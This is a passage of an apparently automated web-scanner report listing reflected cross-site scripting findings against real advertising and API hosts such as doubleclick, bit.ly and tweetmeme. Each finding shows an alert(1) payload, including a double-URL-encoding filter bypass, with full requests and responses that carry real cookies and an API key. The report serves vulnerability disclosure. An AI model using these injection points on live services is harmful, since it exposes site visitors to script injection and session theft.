rs=D08734_72015;rs=D08734_72017;rs=D08734_72020;rs=D08734_72021;rs=D08734_72076;rs=D08734_72079;rs=D08734_72080;rs=D08734_72081;;ptype=sf;rg=ur;pos=T;dcopt=ist;sz=1x1;tile=1;u=http://www.latimes.com/;;f4dc1'-alert(1)-'a79b64de46e=1;~aopt=2/1/8866/1;~sscs=%3f">
...[SNIP]...
2.43. http://ad.doubleclick.net/adj/trb.latimes/hp [rs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.latimes/hp

Issue detail

The value of the rs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 317e6'%3balert(1)//ba95ca61ebb was submitted in the rs parameter. This input was echoed as 317e6';alert(1)//ba95ca61ebb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.latimes/hp;rs=317e6'%3balert(1)//ba95ca61ebb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:02:52 GMT
Expires: Mon, 09 May 2011 16:02:52 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/g;44306;0-0;0;12926859;11962-2000/2000;0/0/0;;~okv=;rs=317e6';alert(1)//ba95ca61ebb;~aopt=2/1/8866/1;~sscs=%3f">
...[SNIP]...
2.44. http://ads.bridgetrack.com/a/f/ [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19659"%3balert(1)//b5b374d2390 was submitted in the click parameter. This input was echoed as 19659";alert(1)//b5b374d2390 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559793&r=175957396&click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS_fitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd2Vla2x5LmNvbboBCTcyOHg5MF9hc8gBCdoBlwFodHRwOi8vd3d3LnB1Ymxpc2hlcnN3ZWVrbHkuY29tL3B3L2J5LXRvcGljL2Jvb2stbmV3cy9wYWdlLXRvLXNjcmVlbi9hcnRpY2xlLzQ3MTM0LWF1dGhvcnMtb24tdGhlLWFpci1kZW1ldHJpLW1hcnRpbi1jaGVsc2VhLWhhbmRsZXItanVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE%26num%3D1%26sig%3DAGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA%26client%3Dca-pub-2666792476259692%26adurl%3D19659"%3balert(1)//b5b374d2390 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 16:03:09 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV164=5117d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODccccccccccccccd163C3Dc68c268c1FJ7Hc38c1CFc24BScH1B9cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB164=D7=&W=72461&Tr=72461&Cp=2248&P=1559793&B=164&D9=&D2=&T=558441&Cr=70012&D5=&S=&Cn=200&Pd=0&SID=5660A087C03345F2801ED49AE062E792&D4=&Vn=1423&Ct=0&Pc=0&D3=&Pb=104&A=8&D8=&D1=&TX=1304956989&D10=&D6=; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 16:03:08 GMT
Connection: close
Content-Length: 4624

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
nVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE&num=1&sig=AGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA&client=ca-pub-2666792476259692&adurl=19659";alert(1)//b5b374d2390http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316736%26BT%5FSID%3D98462%26";var lf="clickTAG=http%3A%2F%2Fadclick%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBzwrqIh
...[SNIP]...
2.45. http://ads.bridgetrack.com/a/f/ [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54efa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fe3918f6da was submitted in the click parameter. This input was echoed as 54efa"><script>alert(1)</script>9fe3918f6da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the click request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a/f/?BT_CON=200&BT_PID=1559793&r=175957396&click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS_fitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd2Vla2x5LmNvbboBCTcyOHg5MF9hc8gBCdoBlwFodHRwOi8vd3d3LnB1Ymxpc2hlcnN3ZWVrbHkuY29tL3B3L2J5LXRvcGljL2Jvb2stbmV3cy9wYWdlLXRvLXNjcmVlbi9hcnRpY2xlLzQ3MTM0LWF1dGhvcnMtb24tdGhlLWFpci1kZW1ldHJpLW1hcnRpbi1jaGVsc2VhLWhhbmRsZXItanVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE%26num%3D1%26sig%3DAGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA%26client%3Dca-pub-2666792476259692%26adurl%3D54efa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fe3918f6da HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 16:03:09 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV164=31364d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODccccccccccccccd163C3Dc68c268c1FJ7Hc38c1CFc2529cI727cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB164=D7=&W=72461&Tr=72461&Cp=2248&P=1559793&B=164&D9=&D2=&T=597063&Cr=70729&D5=&S=&Cn=200&Pd=0&SID=1F5323DC3BCB4DBFAB2838CA2ED90920&D4=&Vn=1423&Ct=0&Pc=0&D3=&Pb=104&A=8&D8=&D1=&TX=1304956989&D10=&D6=; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 16:03:08 GMT
Connection: close
Content-Length: 4674

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
nVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE&num=1&sig=AGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA&client=ca-pub-2666792476259692&adurl=54efa"><script>alert(1)</script>9fe3918f6dahttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316748%26BT%5FSID%3D98462%26" target="_blank">
...[SNIP]...
2.46. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb649"-alert(1)-"896d8cce72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559793&r=175957396&click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS_fitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd2Vla2x5LmNvbboBCTcyOHg5MF9hc8gBCdoBlwFodHRwOi8vd3d3LnB1Ymxpc2hlcnN3ZWVrbHkuY29tL3B3L2J5LXRvcGljL2Jvb2stbmV3cy9wYWdlLXRvLXNjcmVlbi9hcnRpY2xlLzQ3MTM0LWF1dGhvcnMtb24tdGhlLWFpci1kZW1ldHJpLW1hcnRpbi1jaGVsc2VhLWhhbmRsZXItanVsaWUtYW5kcmV3cy5odG1suAIYyALb_Mwf4AIA6gILTGVhZGVyYm9hcmSQA6QDmAPgA6gDAdEDrGtosNr1JsXoA5gJ6AMW6AOZCegD4wL1AwQEAETgBAE%26num%3D1%26sig%3DAGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA%26client%3Dca-pub-2666792476259692%26adurl%3D&eb649"-alert(1)-"896d8cce72=1 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 16:03:11 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: ATV164=25409d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODccccccccccccccd163C3Fc68c268c1FJ7Hc38c1CFc2616cHU95cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB164=D7=&W=72461&Tr=72461&Cp=2248&P=1559793&B=164&D9=&D2=&T=588069&Cr=71718&D5=&S=&Cn=200&Pd=0&SID=DE9EDE43240846CCA257E0223CD55B2C&D4=&Vn=1423&Ct=0&Pc=0&D3=&Pb=104&A=8&D8=&D1=&TX=1304956991&D10=&D6=; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 16:03:10 GMT
Connection: close
Content-Length: 4626

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
AwQEAETgBAE&num=1&sig=AGiWqtwXBm2-6bJmLEB79uXMeaVwHIYciA&client=ca-pub-2666792476259692&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316740%26BT%5FSID%3D98462%26eb649"-alert(1)-"896d8cce72=1";var lf="clickTAG=http%3A%2F%2Fadclick%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBzwrqIhDITfaKDePplQeS%5FfitCIOtlZQCu4DthR3AjbcB4MSmBBABGAEg1NfxGTgAYMmGhYmIpIQQoAG95JTbA7IBGHd3dy5wdWJsaXNoZXJzd
...[SNIP]...
2.47. http://api.bit.ly/v3/shorten [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6c71c<script>alert(1)</script>5513d8f2013 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/shorten?login=pkubasov&apiKey=R_22cc3d39e924b23ae1b9b38b5654ad54&format=json&longUrl=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com&callback=VM.callbackBitLy6c71c<script>alert(1)</script>5513d8f2013 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 16:06:22 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 281

VM.callbackBitLy6c71c<script>alert(1)</script>5513d8f2013({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com", "url": "http:\/\/vibrant.co\/eEajJV", "hash": "eEajJV", "global_hash": "au9vT
...[SNIP]...
2.48. http://api.bit.ly/v3/shorten [longUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 359f4<img%20src%3da%20onerror%3dalert(1)>01c0bac9b14 was submitted in the longUrl parameter. This input was echoed as 359f4<img src=a onerror=alert(1)>01c0bac9b14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /v3/shorten?login=pkubasov&apiKey=R_22cc3d39e924b23ae1b9b38b5654ad54&format=json&longUrl=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com359f4<img%20src%3da%20onerror%3dalert(1)>01c0bac9b14&callback=VM.callbackBitLy HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 16:06:19 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 284

VM.callbackBitLy({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com359f4<img src=a onerror=alert(1)>01c0bac9b14", "url": "http:\/\/vibrant.co\/iUwWcP", "hash": "iUwWcP", "global_hash": "jZLsSy", "new_hash": 1 } })
2.49. http://api.collarity.com/collarity/cws/v3/uQry [appid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.collarity.com
Path:   /collarity/cws/v3/uQry

Issue detail

The value of the appid request parameter is copied into the HTML document as plain text between tags. The payload 44eb7<img%20src%3da%20onerror%3dalert(1)>d1e2071b996 was submitted in the appid parameter. This input was echoed as 44eb7<img src=a onerror=alert(1)>d1e2071b996 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /collarity/cws/v3/uQry?callback=CLPH.handleUUID&appid=msnbc44eb7<img%20src%3da%20onerror%3dalert(1)>d1e2071b996&r=48252711119130251355679477564991 HTTP/1.1
Host: api.collarity.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: passby=surfer

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Date: Mon, 09 May 2011 16:03:18 GMT
Edge-control: bypass-cache, !no-store
Expires: 0
Pragma: no-cache
Content-Length: 127
Connection: keep-alive

CLPH.handleUUID({"details":"Unknown application id: msnbc44eb7<img src=a onerror=alert(1)>d1e2071b996","error":"Server error"})
2.50. http://api.collarity.com/collarity/cws/v3/uQry [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.collarity.com
Path:   /collarity/cws/v3/uQry

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8c6e5<script>alert(1)</script>3593c89ba7a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collarity/cws/v3/uQry?callback=CLPH.handleUUID8c6e5<script>alert(1)</script>3593c89ba7a&appid=msnbc&r=48252711119130251355679477564991 HTTP/1.1
Host: api.collarity.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: passby=surfer

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 09 May 2011 16:03:08 GMT
Edge-control: bypass-cache, !no-store
Edge-control: bypass-cache, !no-store
Expires: 0
P3P: CP="NON DSP COR NID IND NAV UNI INT STA"
Pragma: no-cache
Set-Cookie: cvti=QL_bDKVDwo0pCIjbiF-RAiQF6eDlmB_m5oZg_OjsZDY;Path=/;Domain=.collarity.com;Expires=Thu, 06-May-21 16:03:08 GMT
Content-Length: 127
Connection: keep-alive

CLPH.handleUUID8c6e5<script>alert(1)</script>3593c89ba7a({"hasbk":false,"token":"QL_bDKVDwo0pCIjbiF-RAiQF6eDlmB_m5oZg_OjsZDY"})
2.51. http://api.tweetmeme.com/url_info.jsonc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 38fba<script>alert(1)</script>9c1155ffa67 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com&callback=VM.c10623865538fba<script>alert(1)</script>9c1155ffa67 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 May 2011 16:05:57 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 373
X-Url-Lookup: OrAdd (23)
X-Served-By: h01
Content-Length: 476

VM.c10623865538fba<script>alert(1)</script>9c1155ffa67({"status":"success","story":{"title":"Vibrant - The Leaders of Contextual and In-Text Advertising","url":"http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com","media_type":"news","created_at":"201
...[SNIP]...
2.52. http://api.tweetmeme.com/url_info.jsonc [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 61d9e<img%20src%3da%20onerror%3dalert(1)>73e21013e01 was submitted in the url parameter. This input was echoed as 61d9e<img src=a onerror=alert(1)>73e21013e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.vibrantmedia.com%2F%3Freferrer%3DIntellitxt.com61d9e<img%20src%3da%20onerror%3dalert(1)>73e21013e01&callback=VM.c106238655 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.vibrantmedia.com/?referrer=Intellitxt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 09 May 2011 16:05:56 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 375
X-Url-Lookup: OrAdd (306)
X-Served-By: h01
Content-Length: 365

VM.c106238655({"status":"success","story":{"title":"Vibrant - The Leaders of Contextual and In-Text Advertising","url":"http:\/\/www.vibrantmedia.com\/?referrer=Intellitxt.com61d9e<img src=a onerror=alert(1)>73e21013e01","media_type":"news","created_at":"2011-05-09 16:05:56","url_count":0,"tm_link":"http:\/\/tweetmeme.com\/story\/4990310698","comment_count":0}});
2.53. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 581b4<script>alert(1)</script>629a79ccfc5 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3581b4<script>alert(1)</script>629a79ccfc5&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
